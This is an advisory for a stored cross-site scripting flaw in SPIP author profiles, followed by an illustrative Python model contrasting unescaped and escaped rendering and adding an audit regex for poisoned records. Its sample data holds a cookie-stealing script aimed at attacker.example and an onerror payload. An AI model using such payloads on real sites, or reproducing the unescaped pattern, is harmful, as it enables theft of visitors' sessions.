CVE-2021-44120: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
SPIP is affected by a stored cross-site scripting (XSS) vulnerability; the fix, in ecrire/public/interfaces.php, applies the safehtml filter to the vulnerable fields. An editor can modify their own profile information. If that editor has a published article, the injected script runs in the browser of any visitor to the public site who views the author's information. The "Who are you" and "Website Name" fields are affected.
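The following is an added, self-contained model of the issue described above; it is not SPIP's code. It renders two constructed author records through a vulnerable template (fields interpolated as-is) and a hardened one, and adds the check a practitioner wants after deploying the fix: because the payload lives in the database, profiles poisoned before the patch must be found and cleaned. Field names (`bio`, `site_name`), the sample records, and the use of `html.escape` as a stand-in for SPIP's `safehtml` output filter are assumptions for illustration (`html.escape` is stricter than `safehtml`, which allows a safe HTML subset).

```python
import html
import re

# Constructed sample author records, not real SPIP data. Author 2 has put
# payloads into the two fields the advisory names: "Who are you" (modelled
# here as `bio`) and "Website Name" (modelled as `site_name`).
AUTHORS = [
    {"id": 1, "bio": "Writes about cycling.", "site_name": "Bike Blog"},
    {
        "id": 2,
        "bio": "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
        "site_name": "<img src=x onerror=alert(1)>",
    },
]


def render_author_vulnerable(author):
    """Vulnerable pattern: user-controlled fields are written into the page
    unchanged, so any visitor viewing this author's page runs the script."""
    return (
        f"<p class='bio'>{author['bio']}</p>"
        f"<a href='#'>{author['site_name']}</a>"
    )


def render_author_fixed(author):
    """Hardened pattern: every user-controlled field passes through an output
    filter before it reaches the page. html.escape is an assumed stand-in for
    SPIP's safehtml; it neutralises all markup rather than allow-listing some."""
    return (
        f"<p class='bio'>{html.escape(author['bio'])}</p>"
        f"<a href='#'>{html.escape(author['site_name'])}</a>"
    )


# Triage heuristic for auditing stored data, not a sanitizer: flags script
# tags, inline event handlers (onerror=, onload=, ...) and javascript: URLs.
SUSPICIOUS = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.IGNORECASE)


def find_poisoned_authors(authors):
    """Post-patch check: the fix stops new rendering of payloads, but records
    injected before the upgrade are still in the database. Returns
    (author id, field) pairs that need manual review and cleanup."""
    hits = []
    for author in authors:
        for field in ("bio", "site_name"):
            if SUSPICIOUS.search(author[field]):
                hits.append((author["id"], field))
    return hits


if __name__ == "__main__":
    for author in AUTHORS:
        print("vulnerable:", render_author_vulnerable(author))
        print("fixed:     ", render_author_fixed(author))
    print("poisoned records:", find_poisoned_authors(AUTHORS))
```

Run the module directly to see the two renderings side by side. The audit regex is deliberately loose (it will also flag harmless text such as `version=2`); it exists to produce a short review list, while the actual protection is the output filter applied in every template that prints author fields.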